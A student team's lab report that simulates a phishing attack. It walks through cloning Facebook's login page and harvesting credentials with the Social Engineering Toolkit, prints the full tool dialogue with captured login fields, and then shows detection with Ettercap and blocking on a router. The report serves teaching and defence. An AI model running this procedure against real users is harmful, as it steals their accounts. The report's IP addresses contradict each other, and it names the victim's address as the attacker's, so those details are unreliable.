3110 Team Project

Submission
Gone Phishing
Lab Section L02
Team #1
04/22/14





Gone Phishing Project Report - 1
Table of Contents
Table of Contents (p. 1)
Purpose (p. 2)
Equipment Used (p. 2)
Information Table (p. 4)
Project Process and Procedure (p. 4)
Preface/Disclaimer (p. 4)
Part 1: Set Up Network Infrastructure (p. 4)
Part 2: Set up the Attack (p. 5)
Screen Capture #1: Save Page As (p. 6)
Screen Capture #2: Save the Cloned Page (p. 7)
Part 3: Perform the Capture (p. 8)
Terminal Output #1: SE Toolkit Capture (p. 8)
Part 4: Spot the Attack (p. 8)
Ettercap Output #1: Credential Capture (p. 9)
Part 5: Blacklist the Attacker (p. 9)
Screen Capture #3: Log into the Linksys Router (p. 10)
Screen Capture #4: Create Access Policy (p. 10)
Screen Capture #5: Block the Attacker's IP Address (p. 11)
Conclusion and Summary (p. 12)
Appendix A: SE-Toolkit Procedure (p. 13)
Team Member Signatures (p. 16)




Purpose:
This project attempts to simulate a complete social engineering attack environment, complete
with attacker, victim, and system administrator. All three individuals are assumed to be on the
same network for testing purposes. This serves to simulate a university environment where one
student is trying to steal passwords from other students before an administrator in IT Services
stops them. An attacker, using Kali Linux, aims to steal a victim's credentials as they connect to
Facebook.com. A victim, running Windows 7, will connect via a shortened URL to what they
think is Facebook.com. When they enter their credentials into the fake web page they will be
harvested by Kali Linux and the victim will be rerouted to the real Facebook.com none the wiser.
To combat this, a system administrator running Raspbian on a Raspberry Pi will monitor network
traffic with the package Ettercap. Using Ettercap, the administrator can spot the transfer of stolen
credentials from the victim to the attacker. Once the attacker's IP address is identified, the
administrator can blacklist the attacker using settings on the local network's router.
Equipment Used:
Kali Linux Virtual Machine (Element from Lab 1 of 4)
This virtual machine acted as the attacker in our network environment. The element
from lab combines three things used in lab: a virtual machine, VMWare Player, and an
operating system run inside it. Each of these could be counted as a separate element
if necessary to meet the requirement of four elements from lab. The package used
within Kali Linux to perform the attack is known as the Social Engineering Toolkit.
Raspberry Pi running Raspbian (Element from Lab 2 of 4)
The Raspberry Pi running the Raspbian operating system acted as the system
administrator in our network environment. Once it is discovered that there is a
malicious user on the network, the Kali Linux VM in this example, the administrator
will use the tools at their disposal to capture evidence of the malicious activity and
use this data to blacklist the attacker's IP address.
Ettercap (Element from Lab 3 of 4)
Ettercap is a packet capture and analysis application which will be used in this
environment by the system administrator to spot stolen credentials being transferred
from the victim's IP address to the attacker's IP address. The attacker's IP address
captured here will be used by the router to blacklist the attacker. The Ettercap
package is not natively present on Raspbian, and therefore had to be installed before
the testing began.
Linksys WRT54G Router (Element from Lab 4 of 4)
The router acted as the access point for all three members of the test. Once the
Ettercap capture was complete, it was also used to blacklist the attacker's IP address
so that future attacks could be mitigated.
Windows 7 Laptop (Outside Element)
In order to make the testing environment as authentic as possible, the victim's workstation
did not run a Linux system. Windows 7 was chosen both because of availability and because
it represents the lab workstations available to students across campus in various
computer labs. It is quite possible that at least a few students using lab workstations could
fall for this style of attack.
Information Table:
Name                   Function       IP address
Kali Linux VM          Attacker       192.168.10.21
Windows 7 PC           Victim         192.168.10.17
Raspberry Pi           Administrator  192.168.10.22
Linksys WRT54G Router  Router         192.168.10.1

Project Process and Procedure:
Preface/Disclaimer: This project was originally going to be run within the 3110 Lab
environment. Because of campus restrictions on the use of penetration testing tools like those
found in Kali Linux, the project was moved off campus to avoid school reprimands. Permission
to move the project away from the lab was obtained from Professor Kombol before the project
was started.
Part 1: Set Up Network Infrastructure
The Linksys router used in the project was already configured when the project began, but if
this test were run with an out-of-the-box router not much would change. The new router would
have to be reset to factory settings. Once the router was up and running, an admin would log in
to set the router password, SSID, and WPA passphrase. Assuming that the router is connected to
the internet, the project could progress without further router configuration at this point.
The attacker machine was booted up next. The Kali Linux virtual machine was booted up in
VMWare Player, and once the system was loaded the root account was used to make sure that all
necessary operations were available. A wireless connection to the router was already established
on the host machine that was running VMWare Player, and an ifconfig command confirmed the
IP address of the attacker's machine to be 192.169.10.21. The Social Engineering Toolkit came
preinstalled on our instance of the system, but if it were not present it could be installed
with the following command: apt-get install se-toolkit.
The victim workstation was the next to be brought online. As it was a laptop running Windows 7,
the OS was simply logged into and a wireless connection was established with the built-in
Windows wireless connection tools. An ipconfig /all command revealed the IP address of the
victim's computer to be 192.168.10.17.
The last workstation to be initialized was the administrator's Raspberry Pi. To avoid the hassle
of connecting the Pi wirelessly from the command line, the Pi was connected to the router via an
Ethernet cable. An ifconfig command revealed the administrator's IP address to be
192.168.10.22. Once an active internet connection was established, the package database was
updated with the following command: apt-get update. Once that process was finished, the
Ettercap package was installed with the following command: apt-get install ettercap. To make
Ettercap easier to use, the startx command was run at this point to start up the Raspbian GUI.
Part 2: Set up the Attack
Now that the network infrastructure was configured and each workstation was equipped with the
necessary tools, it was time to set up the attack. Within the Kali Linux VM, the command
se-toolkit was run. The entire dialogue can be found in Appendix A, but an abridged version of
the attack procedure is as follows. Each command is assumed to be run within the Kali Linux
VM. The attack we chose to run is referred to as a Custom Import Attack. The attack goes as
follows:
- A complete copy of a website is downloaded via a browser on the attacker workstation.
- Users are directed to the attacker's IP address, which hosts the copied website.
- Users enter their login credentials in the copied website, believing that it is the real
  thing.
- The attacker gets a copy of the credentials typed into the copied website.
- Users are redirected to the real website after clicking the login button on the copied
  website, none the wiser that they visited a fake version of the website.
To begin, the command se-toolkit was run. This generated a wall of text explaining each of seven
attack options. The one used in this particular test was the Credential Harvester Attack Method,
and therefore option three was selected by typing the number 3 at the command line and hitting
return. Within the Credential Harvester menu, three options were presented. The option chosen
was Custom Import, which also happened to be option number three. The number 3 was submitted
again, and now that the attack had been chosen, we were prompted for a few pieces of
information to get the exploit up and running.
The first piece of information asked for was the IP address to which the captured credentials
should be sent once the attack was finished. This allows a remote server or a member of a botnet
to collect the data so that the attack cannot be traced back to the attacker's own computer. For
the purposes of this test, the native IP address (192.168.10.21) of the Kali Linux VM was used.
The next piece of information asked for was the cloned website, which would be presented to the
user as if it were the real website and would act as the medium through which to capture the
user's credentials. Our copy of Facebook.com was obtained by saving it within the Firefox
browser. The method of copying a website within Firefox is first to select the Firefox button in
the top left corner of the browser to open the menu and then to select Save Page As within the
menu. This is demonstrated by the following screen capture.
Screen Capture #1 Save Page As

Once Save Page As is selected, a menu is opened so the user can choose where to save the web
site. The important thing to remember when performing this second step is to save the copied
web page as index.html so that the Social Engineering Toolkit can find the file. Also, the style of
page saved must remain as the default Web Page, Complete. This step is shown through the
following screen capture.
Screen Capture #2 Save the Cloned Page

Once the spoofed web page was saved as index.html, the file path was entered in the dialogue of
the toolkit. The original index.html file was downloaded on a Windows system and copied via
SSH to the Kali Linux VM. It was copied to the root of the Kali Linux VM's file system.
This is usually a very unwise decision, but for ease of use in the testing environment, the
final file path that was fed to the toolkit was /index.html. The last piece of information required
by the toolkit dialogue was the URL of the original site. This was needed so that after the
credentials were captured the victim could be redirected to the real Facebook.
Now that all the required information had been entered, the attack was ready to run. A shortened
URL was created to trick the victim into thinking our link led to the real Facebook.com. This
URL actually linked to the IP address of the Kali Linux VM.
Part 3: Perform the Capture
Once the attacker machine was actively listening for credentials to capture, it was time for the
victim workstation to play its part. The victim was sent the shortened URL in an email, and they
clicked the link to log into what they thought was Facebook.com. Because the copied web page
was cloned from the original, there was no graphical difference between the copy and the
original Facebook.com. After entering their username and password, the victim clicked the
submit button and the page appeared to refresh. This refresh was actually a redirect to the real
Facebook.com home page. The victim was then presented with the actual Facebook.com and
would have no idea that they had ever visited anything but the real thing.
While the victim would be clueless, the attacker learned quite a bit once the submit button was
clicked. As soon as the victim was redirected to the authentic Facebook.com, the attacker was
greeted with the data sent in the victim's form submission. The Social Engineering Toolkit
parses the request and picks out possible usernames and passwords. The following terminal
output shows what data was sent from the victim's workstation.
Terminal Output #1: SE Toolkit Capture
POSSIBLE USERNAME FIELD FOUND: email=victim@test.com
POSSIBLE PASSWORD FIELD FOUND: pass=mysecretpassword
Now that the credentials were obtained by the Kali Linux VM, the attack was considered
complete.
Part 4: Spot the Attack
For the purposes of the simulation, the system administrator is assumed to always be monitoring
traffic for malicious content. This is accomplished through the application Ettercap. To monitor
all traffic on a network, Ettercap can be set to Bridged Sniffing mode, which allows the
administrator to see and modify packets before they are sent on to their destination. This is the
most basic form of Man in the Middle attack.
Once Bridged Sniffing mode was started, it was simply a matter of time until the victim
navigated to the cloned, fake Facebook.com and entered their login credentials. When the victim
clicked the submit button, before the packet was sent on to the attacker to be recorded by the
Social Engineering Toolkit, the following data showed up in the Ettercap dialogue window.
Ettercap Output #1: Credential Capture
HTTP : 192.168.0.17:80 -> USER: jdjs PASS: hxnx INFO: http://192.168.0.17/
CONTENT: lsd=AVoS8prE&email=jdjs&pass=hxnx&default_persistent=0&timezone=240&
lgnrnd=170553_Dkly&lgnjs=1396310733&locale=en_US
There are two pieces of information revealed within this data capture. First, the final destination
for the data is 192.168.10.17, which is known to be the attacker's IP address. The system
administrator would look at this packet and know that someone on the local network, recognizable
as local from its IP address range, was taking in data from another host. Second, the victim's
credentials are shown within the USER and PASS sections of the packet. The system
administrator would be able to connect these two pieces of information and conclude that
someone on the local network was capturing credentials. Upon discovering this, the system
administrator would take steps to blacklist the malicious user.
Part 5: Blacklist the Attacker
To blacklist the attacker within this simulation, the system administrator chose to use the built-in
tools within the Linksys router's web interface. After logging in with the credentials created in
Part 1, they were greeted with the router's home page. The splash page appeared as shown below.
Screen Capture #3: Log into the Linksys Router

To blacklist an IP address, the Access Restrictions tab was navigated to, and an Internet Access
Policy was created. This policy was named BlockAttacker and was set to deny users seven days a
week, 24 hours a day. This is shown in the following screen capture.
Screen Capture #4: Create Access Policy

The policy to block the attacker had now been created, but the router did not yet know who to
apply this policy to. To resolve this, the button labeled Edit List of PCs was clicked to open a
menu where a list or range of IP addresses could be entered. All IPs listed in this menu would have
the previously created policy applied to them. The following screen capture shows the attacker's
IP address, 192.168.10.17, having been entered into the policy.
Screen Capture #5: Block the Attacker's IP Address

Once the IP address was entered, the Save Settings button was clicked. This saved the policy to
block the IP address 192.168.10.17 on the router at all times. With this countermeasure, the
attacker's machine could no longer continue to steal credentials from the victim. With the
attacker foiled, the simulation and project were concluded.

Conclusion and Summary:
This project went through quite a few revisions before it finally became a reality. Originally, the
fake Facebook.com was going to be a custom-created Facebook.com clone hosted on an
Apache server running on a Raspberry Pi. The site was completed, but with the way that the
se-toolkit is set up to work the site was never needed. Once the se-toolkit was loaded up, our group
was faced with two different options to perform our attack. These two options were Site Cloner
and Custom Import. While the final decision fell to Custom Import, our group spent quite a bit of
time working with the Site Cloner functionality before switching. The Site Cloner attack focuses
on DNS poisoning on the victim machine, thereby sending the victim to the wrong site when
they enter www.facebook.com in their web browser. While this attack seemed more effective in
the real world, the idea of having to gain access to the victim's computer and edit their DNS
record before the attack can take place seemed highly unrealistic for the environment our group
had set up. Because of this, the Custom Import option was our final choice for playing out the
attack.
Each of the members of our group came into this project with some knowledge of how Kali
Linux could be used for penetration testing, but none of us had ever taken the effort to set up
an all-inclusive testing environment so that the real power of Kali Linux could be explored. This
project allowed us to perform hacking attacks that would not be allowed on campus, as well as
to reinforce concepts learned in lab. These concepts include router access policies, wireless
networking, and interpreting data from captured packets.

Appendix A: SE-Toolkit Procedure
The dialogue below is the entire procedure for running the attack from the Kali Linux VM. Items
shown in bold in the original report are elements of user input (the text after each set:webattack>
prompt). All other text is generated by the system to tell the user what choices to make and what
information has been captured. The discovered credentials were underlined in the original report.
root@kali#: se-toolkit
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the
intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a
customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver
a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and
harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, Emgent and the Back|Track team. This method
utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window
pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too
slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can
utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>3
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.0.21
[!] Example: /home/website/ (make sure you end with /)
[!] Also note that there MUST be an index.html in the folder you point to.
set:webattack> Path to the website to be cloned:/index.html
[-] Example: http://www.blah.com
set:webattack> URL of the website you imported:https://www.facebook.com
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.0.22 - - [31/Mar/2014 20:12:01] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVoS8prE
POSSIBLE USERNAME FIELD FOUND: email=victim@test.com
POSSIBLE PASSWORD FIELD FOUND: pass=mysecretpassword
PARAM: default_persistent=0
PARAM: timezone=240
PARAM: lgnrnd=170553_Dkly
PARAM: lgnjs=1396310733
PARAM: locale=en_US
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Team Member Signatures:
Team Members (alphabetical by last name):
Capt Name (printed) Signature
1) Deapo, Donald
2) Green, Kevin
3) Hall, Taylor
* 4) Vance, Philip

Capt: Identify the team captain as point of contact with an asterisk (only one)